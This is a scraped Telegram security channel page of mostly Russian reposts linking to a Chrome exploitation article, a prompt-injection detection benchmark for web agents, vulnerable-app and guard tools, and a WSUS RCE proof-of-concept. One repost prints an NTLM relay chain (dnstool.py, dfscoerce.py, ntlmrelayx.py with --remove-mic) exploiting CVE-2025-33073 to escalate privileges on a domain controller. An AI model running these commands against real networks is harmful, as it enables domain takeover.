Zeropticum🫡 – Telegram
Zeropticum🫡
120 subscribers
106 photos
5 videos
30 files
262 links
Make security greate again!

Contact - @ArtemiyUeax
Download Telegram
Forwarded from OPERATION ZERO RU
101 Chrome Exploitation — Part 1: Architecture

Опубликовали новую статью по эксплуатации Chrome. В ней описана архитектура браузера, его основные компоненты (движок рендеринга Blink, движок JavaScript V8, сетевой стек), а также упражнение, в котором читатели добавят свою функцию в API Blink. Приятного чтения.

https://opzero.ru/press/101-chrome-exploitation-part-1-architecture/
🔥1🤯1
Forwarded from CyberSecurityTechnologies
web_agents_inject.pdf
5.6 MB
#AIOps
#MLSecOps
"WAInjectBench: Benchmarking Prompt Injection Detections for Web Agents", 2025.
]-> Comprehensive benchmark for prompt injection detection in web agents

// we presenting the first comprehensive benchmark study on detecting prompt injection attacks targeting web agents. We construct datasets containing both malicious and benign samples: malicious text segments generated by different attacks, benign text segments from four categories, malicious images produced by attacks, and benign images from two categories
WAVSEP - это уязвимое веб-приложение, разработанное для оценки возможностей, качества и точности сканеров уязвимостей веб-приложений.
Содержит коллекцию уникальных уязвимых веб-страниц, которые можно использовать для тестирования различных свойств сканеров веб-приложений. 2015 год...

https://github.com/sectooladdict/wavsep
CrossGuard: Safeguarding MLLMs against Joint-Modal Implicit Malicious Attacks
https://github.com/AI45Lab/MLLMGuard
Forwarded from Proxy Bar
CVE-2025-59287
*
WSUS Remote Code Execution

writeUp + POC
Forwarded from RedTeam brazzers (Миша)
Всем привет!

А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )

Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.

Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )

Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
1
Список инструментов, статей и ресурсов, которые используют большие языковые модели (LLM) для обратного проектирования (RE), декомпиляции, бинарного анализа и исследований в области кибербезопасности.

https://github.com/ram-elgov/awesome-llm-reverse-engineering
Где же ты была раньше...
Следующий шаг - Джарвис...
Forwarded from GitHub Community
This media is not supported in your browser
VIEW IN TELEGRAM
Papiers — переводчик научного на человеческий

Берёт сложные научные статьи и превращает их:

— в ясный конспект
— с выводами, графами, заметками
— с темами и ссылками на обсуждения


Юзаем здесь

🐱 GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Привет, осинтерам!